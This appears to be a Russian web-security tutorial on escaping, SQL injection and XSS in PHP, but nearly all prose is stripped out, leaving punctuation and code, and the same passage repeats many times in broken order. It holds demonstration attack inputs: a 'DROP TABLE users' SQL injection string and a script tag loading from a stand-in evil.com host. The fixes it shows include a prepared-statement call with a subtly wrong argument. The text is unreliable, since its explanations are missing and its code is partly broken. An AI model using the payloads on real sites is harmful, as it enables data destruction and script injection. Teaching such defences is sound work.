, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
